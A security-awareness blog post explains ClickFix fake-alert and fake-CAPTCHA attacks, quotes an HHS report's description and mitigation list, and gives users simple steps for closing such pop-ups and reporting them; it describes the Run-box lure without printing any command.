What happens when you are confronted with ClickFix?
i.e. (from a linkedinpost by Alex Zammit )
And this is just one example – see below to see 4 more ClickFix examples.
Key Items to Keep in Mind
- Do Not Engage:
- Avoid Clicking Links: Do not click on any links or buttons provided in the alert. This may lead to further infection or phishing attempts.
- Close the Window:
- Force Close the Browser: If the alert prevents you from navigating, close the browser completely. You can use Task Manager (Windows) or Activity Monitor (Mac) to end the browser process if necessary.
- Run Antivirus/Malware Scans:
- Use Trusted Software: Run a full scan using reliable antivirus or anti-malware software to detect and remove any potential threats.
- Clear Browser Data:
- Clear Cache and Cookies: After dealing with the alert, clear your browser’s cache and cookies to remove any remnants of the malware.
- Update Software:
- Keep Everything Updated: Ensure your operating system, browsers, and security software are up to date to protect against vulnerabilities.
- Educate Yourself and Others:
- Stay Informed: Learn about common scams and how to recognize them. Share this knowledge with friends and family to help them avoid similar traps.
- Use Ad Blockers:
- Prevent Pop-Ups: Consider using ad blockers or browser extensions that can help reduce the risk of encountering such malicious alerts in the future.
- Seek Professional Help:
- Contact IT Support: If you’re unsure how to handle the situation, or if issues persist, consider seeking help from a professional who can assist with malware removal.
Doing more research here is a report by Government agency HHS:
4 Examples impersonating Google Chrome, Facebook, PDFSimpli, and reCAPTCHA. 
A concise explanation of the attack from first page:
The ClickFix tactic deceives users into downloading and running malware on their machines without
involving a web browser for download or requiring manual file execution. It makes it possible to bypass
web browser security features, such as Google Safe Browsing, and to appear less suspicious to
unsuspecting corporate and individual users. In this type of attack, compromised websites show fake
browser alerts, which usually warn the user that the webpage or document cannot be displayed correctly
by the browser until they click the “Fix It” button and follow the outlined steps. This results in the user
copying and executing malicious code that installs malware(without realizing they are downloading malware).
Since its discovery, a number of malware delivery campaigns using the same social engineering tactic
have surfaced. The call to action may be “fix the problem,” while other times it is to “prove
you are human” (on fake CAPTCHA pages). An analysis of the malware distribution infrastructure
shows that the attackers could also be targeting users looking for games, PDF readers, Web3 web
browsers and messaging apps, as well as users of the Zoom video conferencing app.And recently GoogleMeet. It is safe to assume any new applications will attempted to confuse the user into following some instructions to download malware and infect their system.
These attacks started in March 2024 and have changed to different attacks. Here is one in October 2024 with GoogleMeet
Here are the recommendations:
Defense and Mitigations
Organizations should train users to identify and report suspicious activity to their security teams. This specific training can easily be integrated into an existing user training program; more specifically, here are some recommended mitigations and remediations against ClickFix attacks:
• Conduct regular training sessions to educate users about social engineering tactics and phishing
schemes.
• Install and maintain updated anti-virus and anti-malware software on all endpoints.
• Implement robust email filtering to block phishing emails and malicious attachments.
• Use web filtering solutions to prevent access to known malicious websites.
• Deploy firewalls and intrusion detection/prevention systems (IDS/IPS) to monitor and block
malicious network traffic.
• Use network segmentation to limit the spread of malware within the organization.
• Enforce the principle of least privilege (PoLP) to minimize user access to only necessary resources.
• Implement security policies to monitor and restrict clipboard usage, especially in sensitive
environments.
• Implement multi-factor authentication (MFA) for accessing sensitive systems and data.
• Ensure all operating systems, software, and applications are kept up to date with the latest security
patches.
• Continuously monitor and analyze system and network logs for signs of compromise.
• Encrypt sensitive data both in transit and at rest to protect it from unauthorized access.
• Regularly back up important data and store backups securely to ensure data recovery in case of a
ransomware attack or data breach.
In other words have a comprehensive security plan with a Security Policy and more.
We could keep it simple with 3 actions:
- Do Not Engage:
- Avoid Clicking Links: Do not click on any links or buttons provided in the alert. This may lead to further infection or phishing attempts.
- Close the Window:
- Force Close the Browser: If the alert prevents you from navigating, close the browser completely. You can use Task Manager (Windows) or Activity Monitor (Mac) to end the browser process if necessary. (must learn or understand how to “end the process”)
- Inform IT help desk or other IT knowledgeable person. Reboot the system if no one is available. DO NOT FOLLOW INSTRUCTIONS
I have just added a ClickFix addon security policy section with examples on my Shop
A site popped this “I’m not a Robot check”. The site injected a command to my clipboard and is trying to convince me to run it.
1) The first command asks me to open the Windows Run command box.
2) The second asks me to copy what’s in the clipboard to the Run window.
3) The third step runs the command.
The command uses some tricks to obfuscate the parameters being passed to the powershell cli, very sneaky.